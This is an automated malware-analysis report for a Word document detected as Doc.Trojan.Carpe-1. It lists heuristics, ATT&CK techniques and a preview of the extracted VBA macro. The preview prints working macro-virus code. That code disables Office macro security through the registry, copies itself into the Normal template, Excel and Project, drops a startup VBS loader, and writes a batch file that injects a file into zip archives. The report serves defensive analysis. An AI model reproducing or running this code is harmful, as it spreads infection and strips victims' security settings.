MALICIOUS
340
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The sample contains a critical OLE_VBA_SHELL heuristic, indicating the presence of a Shell() call within its VBA macros. The Document_Open macro attempts to disable macro security settings and inject code into the Normal template, likely to establish persistence. The ClamAV detection 'Doc.Trojan.Carpe-1' further supports its malicious nature. The primary attack vector is likely Spearphishing Attachment, with the VBA code aiming for persistence via registry modifications.
Heuristics 7
-
ClamAV: Doc.Trojan.Carpe-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Carpe-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9084 bytes |
SHA-256: a264144b3384dcdf0329497bb235a5f6c64aaeff10921b4e1b6d0a76e7191ff1 |
|||
|
Detection
ClamAV:
Doc.Trojan.Carpe-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()
On Error Resume Next
Options.SaveNormalPrompt = False
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.VirusProtection = (42 - 42)
End If
Options.ConfirmConversions = False
Options.SendMailAttach = True
Set nrm = NormalTemplate: i = 1
Set aiv = ActiveDocument
Set rar = Codmodule
Set aktiv = aiv.VBProject.VBComponents(i).Codemodule
Set nrmal = nrm.VBProject.VBComponents(i).Codemodule
If nrmal.Lines(167, 1) <> "'" Then
nrmal.DeleteLines 1, nrmal.CountOfLines
nrmal.InsertLines 2, aktiv.Lines(2, aktiv.CountOfLines)
nrmal.InsertLines 1, "Sub Document_Open()"
nrmal.Replaceline 67, "Sub Elpaso()": nrmal.Replaceline 105, "Sub Workbook_Dactivate": Open "c:\wrdvbs.exp" For Output As 1:
'Carpe Diem
Print #1, nrmal.Lines(1, nrmal.CountOfLines): Close 1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 5 0 1 1 1 1 0 0 0 0 0 0 0 0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 0 7 6 0 0 0 0 0 0 0 0 0 0 0"
End If
If aktiv.Lines(167, 1) <> "'" Then
aktiv.DeleteLines 1, aktiv.CountOfLines
aktiv.InsertLines 2, nrmal.Lines(2, nrmal.CountOfLines)
'I stand on the edge of a new millenium
aktiv.InsertLines 1, "Sub Document_Close()"
aktiv.Replaceline 67, "Sub nacho()": aktiv.Replaceline 105, "Sub Workbook_tivat"
'waiting for yesterdays Dreams
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End If
Set projobj = GetObject(, "MSProject.Application")
If projobj = "" Then GoTo out
Set proj1obj = projobj.Projects.Add: proj1obj.VBProject.VBComponents.Item(1).Codemodule.InsertLines 1, nrmal.Lines(1, nrmal.CountOfLines)
proj1obj.VBProject.VBComponents.Item(1).Codemodule.Replaceline 67, "Private Sub Project_Deactivate(ByVal pj As MSProject.Project)"
out:
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
Set BookObj = xlApp.Workbooks.Add
'To Become tomorrows Reality
BookObj.VBProject.VBComponents.Item("ThisWorkbook").Codemodule.InsertLines 1, nrmal.Lines(1, nrmal.CountOfLines)
BookObj.VBProject.VBComponents.Item("ThisWorkbook").Codemodule.Replaceline 105, "Sub Workbook_DeActivate()"
BookObj.SaveAs xlApp.Application.StartupPath & "\Book1."
BookObj.Close: xlApp.Quit
'Carpe Diem!!!!
'
Open "c:\Windows\Start Menu\Programs\Startup\Reminder.Vbs" For Output As 1
Print #1, "Call vbloader": Print #1, "Sub vbloader()": Print #1, "On Error Resume Next"
Print #1, "Set wo = CreateObject(""Word.Application"")": Print #1, "wo.Options.VirusProtection = (Rnd * 0)"
Print #1, "wo.Options.SaveNormalPrompt = (Rnd * 0)": Print #1, "wo.NormalTemplate.VBProject.VBComponents.Item(1).Codemodule.deletelines 1 ,wo.NormalTemplate.VBProject.VBComponents.Item(1).Codemodule.countoflines ": Print #1, "wo.NormalTemplate.VBProject.VBComponents.Item(1).Codemodule.AddFromFile ""c:\wrdvbs.exp""": Print #1, "wo.NormalTemplate.Save"
Print #1, "wo.Quit": Print #1, " ": Print #1, "End Sub": Close 1: Reset
Open "c:\Windows\Zipinf.bat" For Output As 1: Print #1, "Set wz=""c:\Program Files\WinZip\WinZip32.exe"""
Print #1, "for %%a in (*.zip ..\*.zip Windows\Desktop\*.zip) do %wz% -a -r -p %%a c:\cdlist.rtf": Close
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.